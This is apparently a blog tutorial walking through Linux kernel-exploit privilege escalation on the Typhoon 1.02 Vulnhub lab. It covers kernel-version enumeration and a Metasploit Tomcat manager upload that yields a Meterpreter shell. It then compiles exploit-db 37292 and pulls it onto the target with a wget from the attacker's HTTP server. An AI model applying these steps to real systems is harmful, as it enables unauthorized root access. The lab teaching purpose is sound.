Escalating privileges in Linux can be tough, while there are are automated tools for vulnerability discovery there are techniques we can use to win the game.
Linux privilege escalation using kernel exploits is one of those fundamental ethical hacking techniques.
I show you how to do so using the Typhoon 1.02 vulnhub walkthrough which conveniently holds all the material I need to cover this technique!
Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.
Table of Contents
What You Need
- Typhoon 1.02 Vulnhub Machine – VirtualBox
- Kali Linux Virtual Machine – VirtualBox
Get The Kernel Version
One command I use is the lsb_release -a command to get the correct Linux kernel version so that I can research the right exploit.
Or try these other manual commands to get the kernel version.
[kali@kali:] $ cat /etc/issue
[kali@kali:] $ cat /proc/version
Additionally we can use another flag with the same uname command. The -r will show the kernel release.
taco@debian:~$ uname -r
2.6.32-5-amd64
Let’s get into this a little more.
2.6.32-5.amd64
2 = major kernel version
6 = major release version
32 = minor revision level
32-5 = level of patches and fixes installed
Get Kernel Vision Using Metasploit
Another way to get the kernel version is to use Metasploit.
In this case I have found a tomcat manager service running with default credentials configured.
As a result I have used the Metasploit exploit multi/http/tomcat_mgr_upload which requires credentials. But the exploit returns a meterpreter session!
Once I have that meterpreter session I can use the sysinfo command to get the Linux kernel version.
Compile The Exploit
There can be difficulties in compiling exploit believe me, but this is not the case luckily here.
gcc 37292.c -o rootme.exe
Get The Exploit To The Target
I compiled the exploit, but now how do I get it to the remote target for execution so that I can escalate my low level privileges to root?
python -m SimpleHTTPServer 8000
Then on the target on the shell I have I run the command below:
wget http://kali-ip:8000/rootme.exe
Run The Exploit Get Root
First I am going to change the file permissions of the exploit so that I can run it.
I have successfully run the compiled exploit for the Linux kernel version and in doing so I have escalated my privileges to root. I got the flag!
Using Dirty Cow Exploits
Using Sagi Shahar’s Github we can use a reliable vulnerable Linux machine to test the dirty cow exploits on.
https://www.exploit-db.com/exploits/40616